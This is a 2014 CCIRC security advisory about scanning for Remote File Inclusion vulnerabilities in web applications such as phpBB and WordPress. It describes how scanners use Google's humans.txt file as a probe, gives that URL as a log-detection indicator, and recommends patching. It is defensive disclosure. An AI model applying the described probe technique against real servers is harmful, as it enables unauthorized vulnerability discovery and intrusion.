Remote File Inclusion vulnerability scanning
Date: 14 January 2014
The purpose of this alert is to bring attention to increased scanning activity for Remote File Inclusion (RFI) vulnerabilities.
CCIRC has observed increased reporting of RFI vulnerability scanning against internet facing web servers. Exploitation of an RFI vulnerability could lead to a variety of malicious activity, including remote code execution, DoS attacks, theft of personal/financial information, or website defacement.
Recently observed scans are attempting to remotely locate if known RFI vulnerabilities exists in various web applications including phpBB and Wordpress, among others. The scans use a legitimate file located at ‘www[.]google.com/humans[.]txt' to pass to the web application. If the scan is successful, then the scanner/attacker will receive an answer from the targeted web application with the contents of humans.txt originally from Google.com. This proves that the web application contains an RFI vulnerability that can be potentially exploited at a later date.
Please note that the URL ‘www[.]google.com/humans[.]txt' is not malicious but is used by the scanner/attacker to determine if the web application is exploitable.
Examples of traffic observed looking for RFI vulnerabilities:
- CCIRC recommends reviewing webserver log files for unusual activity or entries. Entries that have the string “http://www.google[.]com/humans.txt” should be considered suspicious and investigated further for signs of compromise.
- CCIRC recommends that system administrators test and deploy the vendor-released updates to affected applications accordingly.
- Follow the suggested action as outlined in CCIRC's Information Note IN13-001 Content Management Systems Security and Associated Risks
Note to Readers
In support of Public Safety's mission to build a safe and resilient Canada, CCIRC's mandate is to help ensure the security and resilience of the vital non-federal government cyber systems that underpin Canada's national security, public safety and economic prosperity. As Canada's computer security incident response team, CCIRC is Canada's national coordination centre for the prevention and mitigation of, preparedness for, response to, and recovery from cyber incidents on non-federal government systems. It does this by providing authoritative advice and support, and coordinating information sharing and incident response.
Please note, CCIRC PGP key has recently been updated.
For general information, please contact Public Safety Canada's Public Affairs division at:
Telephone: 613-944-4875 or 1-800-830-3118
- Date modified: